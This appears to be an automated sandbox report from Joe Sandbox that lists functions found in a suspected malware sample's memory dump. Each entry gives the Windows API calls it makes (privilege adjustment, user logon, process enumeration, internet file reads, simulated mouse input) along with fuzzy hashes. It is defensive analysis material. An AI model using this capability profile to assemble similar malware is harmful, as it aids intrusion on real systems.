GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006380F6

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 790fae2f946daf712fdd7cce1d41972a8f4bfd3c32289d273aea2077fe7c4489
Instruction ID: 1f453e7bdbe536cb92843d9b2786aa3b6c9686dc2109504d2013784b7c9d2c97
Opcode Fuzzy Hash: 790fae2f946daf712fdd7cce1d41972a8f4bfd3c32289d273aea2077fe7c4489
Instruction Fuzzy Hash: FFF06271244305AFEB100FA5EC8DEE73BAEFF8A795F001025F945C7250CBA19C51DAA0

Function 005E4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005E4AD0), ref: 005E4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005E4B57

Strings

GetNativeSystemInfo, xrefs: 005E4B51
kernel32.dll, xrefs: 005E4B40

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 469b8bb417d89a05643369045cd8d466d8f6d63db02e260aafe07ee2ac19037a
Instruction ID: 0ad19047781cc579f157ae13c89ceeee2ec7ab0ce36e74783e4e4b7347c641e7
Opcode Fuzzy Hash: 469b8bb417d89a05643369045cd8d466d8f6d63db02e260aafe07ee2ac19037a
Instruction Fuzzy Hash: 59D01234A10713CFDB209F32F818B06B6D9BF05391B119879D4C5D6150D6B0D480CA54

Function 0065EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0065EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0065EE4B

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Process32NextW.KERNEL32(00000000,?), ref: 0065EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0065EF1A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 79f0f493d671cf392cd6fcb8aef1ba7055a2f4274fe41cf4497020754cb7ffe0
Instruction ID: 820cef84b24e4b903e5344499b15ca15fe9f28b2589282f53ba2c946a8c2bc50
Opcode Fuzzy Hash: 79f0f493d671cf392cd6fcb8aef1ba7055a2f4274fe41cf4497020754cb7ffe0
Instruction Fuzzy Hash: D3518E715083459FD714EF25DC85EABBBE8FF98710F00482DF995972A1EB70A908CB92

Function 0063E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0063E628

Strings

(, xrefs: 0063E66E
|, xrefs: 0063E658

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 085868b9862784aa3913d5bb7d04c87325a45f1a4306ba2b7ff5b0ec1c200143
Instruction ID: ce54c67ea317979a0111861cae63a2277dffa6ccf5cb628a01a8bf7458d8f2d9
Opcode Fuzzy Hash: 085868b9862784aa3913d5bb7d04c87325a45f1a4306ba2b7ff5b0ec1c200143
Instruction Fuzzy Hash: 1D321575A006059FDB28CF19C481AAAB7F1FF48310F15C46EE89ADB3A1D771E941CB94

Function 006522EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0065180A,00000000), ref: 006523E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00652418

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 76dcf3d8edc5d701886f7a55fed321772b8b45b7d7a1d9b744203b80e444f4a3
Instruction ID: e7a67aa7e183e17bba469098604e33b535ca7e3a54a7f32461cd3620b96b02d9
Opcode Fuzzy Hash: 76dcf3d8edc5d701886f7a55fed321772b8b45b7d7a1d9b744203b80e444f4a3
Instruction Fuzzy Hash: 6D41F67190420ABFEB10DE95DC91FFB77EEEB41316F10402EFE01A6280DA749E499664

Function 0064B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0064B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0064B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0064B3EA

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d0ef04da0b29037b9dd4d007429b77835c8e0bbd430ec306e1027d8cd1217afe
Instruction ID: 8c2d745c8b7e76628b8ff09dad0c89f865e825ea7a8bcab451b45494004cb1eb
Opcode Fuzzy Hash: d0ef04da0b29037b9dd4d007429b77835c8e0bbd430ec306e1027d8cd1217afe
Instruction Fuzzy Hash: 40219035A00118EFCB00EFA5D884AEDFBB9FF49314F0480A9E845AB361CB319915CB51

Function 006387E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00638858
GetLastError.KERNEL32 ref: 00638865

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 517b02cb2dd2a06c169ba4cf6560d53b948e48fd92c40ca765abb86fcbd26ced
Instruction ID: 116aba6a914c6b0c173ae670a6423f00973532ced0c92af3f6f5f81bcd95abda
Opcode Fuzzy Hash: 517b02cb2dd2a06c169ba4cf6560d53b948e48fd92c40ca765abb86fcbd26ced
Instruction Fuzzy Hash: F8118FB2414305AFE718DFA4EC85D6BB7FEEB44710B20852EF45697241EB70BC418B60

Function 0063874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00638774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0063878B
FreeSid.ADVAPI32(?), ref: 0063879B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 5be4eaf3bbe6f0dea27eee48431ff449dc699e9b7015aa691111fe28b5da3d32
Instruction ID: 46f5975905187235b88ffae78fa265689f0eeee3cd4ef5acaee0b71cab92bf87
Opcode Fuzzy Hash: 5be4eaf3bbe6f0dea27eee48431ff449dc699e9b7015aa691111fe28b5da3d32
Instruction Fuzzy Hash: F4F04975A1130CBFDF00DFF4DD99AAEBBBDEF08201F1044A9E901E2281E6756A448B50

Function 00648889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0064889B

Part of subcall function 0060520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00648F6E,00000000,?,?,?,?,0064911F,00000000,?), ref: 00605213
Part of subcall function 0060520A: __aulldiv.LIBCMT ref: 00605233

Strings

0ej, xrefs: 00648892

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0ej
API String ID: 2893107130-1858546470
Opcode ID: bf5dc43b72f968181551cc076c0e028bacc6d09bb9aa7b59c79718f0e33939b6
Instruction ID: 8f46992c36c225285bfff1f489cbed5ec2a8e816339ebbd45191eaf7c148f2a7
Opcode Fuzzy Hash: bf5dc43b72f968181551cc076c0e028bacc6d09bb9aa7b59c79718f0e33939b6
Instruction Fuzzy Hash: A821A232A256108FC729CF25D851A52B3E2EFA5311B689E6CE1F5CB2C0CA34B905CF54

Function 00644C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00644CB3

Strings

DOWN, xrefs: 00644C98

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: dc3bb7e0af6a04d3ad649f8abd5b21d4748b009f13f479c998adea8df9a402eb
Instruction ID: 1d7bd8fc02ac0f98d524174b09a8720d4801f04445ddb2f3188d0e872ed65d93
Opcode Fuzzy Hash: dc3bb7e0af6a04d3ad649f8abd5b21d4748b009f13f479c998adea8df9a402eb
Instruction Fuzzy Hash: 64E046621DD72238EA882A28FC07FF7028E8F22339B15020AF814E55C1ED812C8224A9

Function 0064C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0064C6FB
FindClose.KERNEL32(00000000), ref: 0064C72B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7a0bfa4cee3a1388aec34246c0800c234c6b7ded9175e833e25a57e9fae7d7ce
Instruction ID: 3176d27fa55d296d32cf775addba5b62ee26bc96535a087b6deef47e0fabdaa2
Opcode Fuzzy Hash: 7a0bfa4cee3a1388aec34246c0800c234c6b7ded9175e833e25a57e9fae7d7ce
Instruction Fuzzy Hash: A3118E726042009FDB10DF29D859A6AFBE9FF85324F00851EF8A9973A0DB70AC01CF81

Function 0064A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00659468,?,0066FB84,?), ref: 0064A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00659468,?,0066FB84,?), ref: 0064A0A9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: beeac11a93bb10c7eb347b70ffc115f235ef824ac037849eb547754f8e1f7d8a
Instruction ID: 31fa89cb639a31a76efb658c4a87810b356af65d4b9a8673ecdc15260c72b51b
Opcode Fuzzy Hash: beeac11a93bb10c7eb347b70ffc115f235ef824ac037849eb547754f8e1f7d8a
Instruction Fuzzy Hash: CEF0E23514422DBBDB209FA4DC48FEA776EFF08761F004265F918D6280C6709A40CBA1

Function 006381CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00638309), ref: 006381E0
CloseHandle.KERNEL32(?,?,00638309), ref: 006381F2

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: dca8681dfd4a8b81b2165270a83cae634707590c49c6954cdb549d6279b037af
Instruction ID: 6781a6e6202829ee6f77a9e8941030109c0b3a7cc526303681bed583249b36b2
Opcode Fuzzy Hash: dca8681dfd4a8b81b2165270a83cae634707590c49c6954cdb549d6279b037af
Instruction Fuzzy Hash: 24E0EC72014612AFF7652B60FC09EB77BEBEF04350B24982DF8A694470DB62AC91DB54

Function 0060A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00608D57,?,?,?,00000001), ref: 0060A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0060A163

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7809065260f12fe39c0d22695d6f1a3330981357af46727e752add745c90b2c3
Instruction ID: 614537f248353c5397ca64f1fdb805928e7e42e3fd90b44e85c7001f5341497e
Opcode Fuzzy Hash: 7809065260f12fe39c0d22695d6f1a3330981357af46727e752add745c90b2c3
Instruction Fuzzy Hash: 37B09231058208ABCB002B91FC09B883F6AEB44AA2F405020F60D94260EFA254508AD1

Function 0060F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cfad90528810dc710f64d3cc68300fcce36e1356945ee27c67e4c5c32da3bea
Instruction ID: 6898c06c1ec6c9dc251feea797ad3cbe88680a59272c5e635b4a7762dcc66dc4
Opcode Fuzzy Hash: 9cfad90528810dc710f64d3cc68300fcce36e1356945ee27c67e4c5c32da3bea
Instruction Fuzzy Hash: D032E221D69F014DD72B9A34D832336A24AAFB77D4F15D737E81AB5EA6EB29C4C34100

Function 0061242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2adf9a8b33a589363abe0807fd4d7f3f90065d79cec395f4a00f82e251b404
Instruction ID: 666ffced651be4f025777f13b75279c3acc935305959a4019f5574d46fc5b469
Opcode Fuzzy Hash: 8d2adf9a8b33a589363abe0807fd4d7f3f90065d79cec395f4a00f82e251b404
Instruction Fuzzy Hash: 78B1DD30D2AF414DD3239A39883533AB69DAFBB2D5B51E71BFC1A74D22EB2285C34141

Function 006387B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00638389), ref: 006387D1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 8552d97ce417df6ea4694cb33d192ada27ee6ed88495017a8bb434ac11dd0b9a
Instruction ID: 8c3964ad2c4bedc30e820f0694d34c6d0ffd298ea9e6fb2bb3fc134b836566fc
Opcode Fuzzy Hash: 8552d97ce417df6ea4694cb33d192ada27ee6ed88495017a8bb434ac11dd0b9a
Instruction Fuzzy Hash: 17D09E3226450EBBEF019FA4ED05EAE3B6AEB04B01F408511FE15D51A1C7B5D935AB60

Function 0060A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0060A12A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 150489708849ef45a5a68cce93cc1f847bf2508a4dce600d9384df97941d3a8a
Instruction ID: ac08cb9b52718142e1a8be7f8c9e976dbcc1506b2ea3a4b64ea824995e95959e
Opcode Fuzzy Hash: 150489708849ef45a5a68cce93cc1f847bf2508a4dce600d9384df97941d3a8a
Instruction Fuzzy Hash: EAA0223000020CFBCF002F82FC08888BFAEEB002E0B008030F80C80232EFB3A8208AC0

Function 005F8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ba869e7f12822d76771133c6c34cbaf1ab1291ca8d860fe45936c3af31dcb6
Instruction ID: 18fc39a06ac2a7a25853684a81259a635bbcde109735d52bdbc831da07f5d888
Opcode Fuzzy Hash: 62ba869e7f12822d76771133c6c34cbaf1ab1291ca8d860fe45936c3af31dcb6
Instruction Fuzzy Hash: 9A22053060451ACBDF288B24C4D47BDBBA3FF41354F28846BDA978B692DB789D91C781

Function 006021C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
